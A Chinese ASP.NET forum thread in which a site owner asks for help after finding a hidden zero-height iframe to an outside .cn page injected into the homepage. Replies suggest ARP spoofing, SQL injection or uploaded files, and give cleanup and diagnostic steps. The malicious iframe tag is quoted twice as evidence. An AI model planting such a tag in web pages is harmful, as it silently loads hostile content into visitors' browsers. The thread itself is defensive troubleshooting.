==受不了了。网站中病毒了,请大家帮我看看。谢谢。==
网站打开后,在首页源代码的最上面被加上了:<iframe src=http://s82mnl12.cn/cn4.htm width=50 height=0 border=0></iframe>
这一句在我的.aspx的源代码里并没有。
谢谢。 --------------------编程问答-------------------- 用360杀毒看看。有时候杀毒软件不管用,这个东东能凑合用。 --------------------编程问答-------------------- 这个好像并不是你的网站中毒了,可能是 ARP 挂马。你在百度中搜索一下“ARP 挂马”,里面有相关的资料。 --------------------编程问答-------------------- 一般是网站有漏洞,被上传文件了 --------------------编程问答-------------------- 学习中,帮你顶起来 .. --------------------编程问答-------------------- 被挂马了
检查网站是否有sql注入的漏洞 --------------------编程问答-------------------- 我也遇到过这个问题。把这个删了 然后检查其他页面有没有。都删了。然后升级杀毒程序吧 --------------------编程问答-------------------- 有条件的话,检查下你的服务器日志 --------------------编程问答-------------------- 中ARP了联系机房吧 --------------------编程问答-------------------- arp 欺骗;
考虑以下问题:
1.局域网某台电脑中了arp病毒;可以用360试试,找一下ip地址和mac;
或者,让非公司局域网内的用户访问一下,看看是不是也是那样,如果是那样,那就说明是服务器中招了;
2.服务器sql注入;
3.如果你整个网站没有用到iframe,那就在网上搜索一下,一句代码可以屏蔽iframe功能。
good luck! --------------------编程问答-------------------- 这种情况是被挂易做图,我们网站以前遇到过.你可以查看一下网站里的有没有可疑的文件,一般都可以批量处理的.可以根据出现这个代码的哪个文件的修改时间来查看,删除那个文件或者更改路径为自己所用.
补网站程序漏洞 --------------------编程问答-------------------- <iframe src=http://s82mnl12.cn/cn4.htm width=50 height=0 border=0> </iframe>
这一句在我的.aspx的源代码里并没有.
服务器没有被篡改,这说明代码是在传输过程中加上去的,比较可能的就是arp 欺骗, 通过取得代理权,然后篡改Http的响应信息。
最可能的原因:局域网内的机器中毒 --------------------编程问答-------------------- 确定中毒机器:
arp -a
如果显示出来的网关IP对应的MAC并不是网关的真实MAC,那么这个MAC就是中毒机器的物理地址。 --------------------编程问答-------------------- --------------------编程问答-------------------- --------------------编程问答-------------------- 可能是JS挂马,你看看主页引用的JS有没有变化? --------------------编程问答-------------------- --------------------编程问答-------------------- 学习中。。。。。。。。。 --------------------编程问答--------------------
现在有些人也真是无聊,总是攻击别人,恐怕显示不出自己的水平,严重鄙视这种人。 --------------------编程问答-------------------- --------------------编程问答-------------------- 是被挂码了。
先把码删掉。
找个ASP防驻入和SQL防驻入的放到公共文件里。
就可以了
--------------------编程问答-------------------- 中ARP病毒了 --------------------编程问答-------------------- 数据库表中是否也被注入了iframe?如果是,就是sql注入攻击了,程序有漏洞。 --------------------编程问答-------------------- iframe框架被嵌入式攻击。注意查看SQL是否有被注入的地方 --------------------编程问答-------------------- 啊D注入工具 V2.32.exe
查看有没注入点 --------------------编程问答-------------------- --------------------编程问答-------------------- 网站被上传恶意文件了
补充:.NET技术 , ASP.NET